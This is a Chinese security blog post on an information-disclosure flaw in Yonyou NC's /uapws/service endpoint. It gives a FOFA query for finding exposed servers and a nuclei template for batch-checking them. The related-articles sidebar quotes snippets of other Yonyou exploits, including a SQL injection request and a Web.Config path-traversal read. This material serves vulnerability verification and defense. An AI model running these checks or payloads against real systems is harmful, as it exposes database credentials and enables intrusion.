首页 > 其他分享 >用友NC service接口信息泄露漏洞

用友NC service接口信息泄露漏洞

时间:2023-09-07 15:56:49浏览次数:32  
标签:yonyou service 漏洞 NC uapws 用友

漏洞描述

用友nc有个接口可以获取数据库账户密码,不过是老版本了

漏洞复现

fofa语法:app="用友-UFIDA-NC"
POC:/uapws/service

nuclei批量yaml文件

id: yonyou_NC-uapws-server-api

info:
  name: yonyou_NC-uapws-server-api
  author: nigori
  severity: high
  description: fofa app="用友-UFIDA-NC"
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: yonyou,nc,oa,bjxsec

requests:
  - method: GET
    path:
      - "{{BaseURL}}/uapws/service"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "{http://"
          - "<html><body><p> <a"
          - "</a> </p></body></html"
        part: body
        condition: and

      - type: status
        status:
          - 200

标签:yonyou,service,漏洞,NC,uapws,用友
From: https://www.cnblogs.com/pursue-security/p/17685157.html

相关文章

  • 用友NC 6.5未授权文件上传漏洞
    漏洞描述用友NC6.5版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务器控制权限。影响版本NC6.5漏洞复现fofa语法:app="用友-UFIDA-NC"访问页面POC脚本如下:importrequestsimportthreadpoolimporturllib3importsysimportargparseurllib3.di......
  • map、sync.map、concurrent-map适用场景与源码解析
    最近一直加班,无论工作日还是周末,虽然每天很忙但总感觉空空的,很少有时间停下来思考与总结。项目中各种甩锅,最后最苦逼的还是落到了研发的头上,文档编写、环境部署、问题排查虐得一遍又一遍。事情杂乱,研发效率超级低,不知道何是是个头呀背景在go中,map是最常用的集合之一。其底层key存......
  • 【错误记录】Android Studio 创建 Module 模块报错 ( Cannot resolve external depend
    文章目录一、报错信息二、解决方案目前使用的是最新的Gradle配置,创建Module生成的源码与Gradle配置出现了冲突,导致的问题;解决此类问题,要仔细检查Gradle构建脚本,排查每个依赖库的来源;本次错误就是AS系统自动成的Module修改了Gradle构建脚本,导......
  • 用友GRP-U8 Proxy SQL注入 CNNVD-201610-923
    漏洞描述用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行影响版本用友GRP-U8行政事业内控管理软件(新政府会计制度专版)漏洞复现fofa语法:title="用友GRP-U8行政事业内控管理软件"登录页面:POC:POST/ProxyHT......
  • 软件测试|DISTINCT关键字应该怎么用?
    探索SQL中的DISTINCT关键字DISTINCT简介在SQL(StructuredQueryLanguage)中,DISTINCT关键字是一个强大的工具,用于查询去重。它允许我们从数据库中获取唯一(不重复)的记录,而不考虑其他列的值。本文将深入探讨SQL中的DISTINCT关键字,包括其语法、用途和示例。DISTINCT语法DISTINCT关......
  • 用友畅捷通T+ Upload.aspx任意文件上传漏洞CNVD-2022-60632
    漏洞描述用友畅捷通T+Upload.aspx接口存在任意文件上传漏洞,攻击者通过preload参数绕过身份验证进行文件上传,控制服务器漏洞影响用友畅捷通T+漏洞复现fofa语法:app="畅捷通-TPlus"登录页面如下:上传文件类型验证不完善,可上传任意文件到服务器中的任意位置,验证POCPOST/......
  • 用友时空KSOA imagefield SQL注入
    漏洞简介用友时空KSOA平台/servlet/imagefield存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。漏洞复现fofa查询:app="用友-时空KSOA"登录页面如下:POC:GET/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+......
  • 杰哥教你面试之一百问系列:java中高级多线程concurrent的使用
    目录问题1:什么是ConcurrentHashMap?它与HashMap的区别是什么?问题2:什么是CopyOnWriteArrayList?它适用于什么样的场景?问题3:什么是BlockingQueue?它的作用是什么?举例说明一个使用场景。问题4:什么是Semaphore?它如何控制并发访问?问题5:什么是CountDownLatch?它适用于什么场景?问题6:什么是Cyc......
  • 用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
    漏洞描述用友畅捷通T+DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件漏洞复现fofa语法:app="畅捷通-TPlus"登录页面如下POC:/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Confignuclei批量yaml文件id:yonyou_cha......
  • cv2.error: Unknown C++ exception from OpenCV code.报错解决
    问题原因:opencv版本太高,python版本太低解决办法:打开opencv下载网站找到自己的python版本对应的opencv的版本,然后通过下面代码安装pipinstallopencv-python==4.1.2.30-ihttps://pypi.tuna.tsinghua.edu.cn/simple ......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99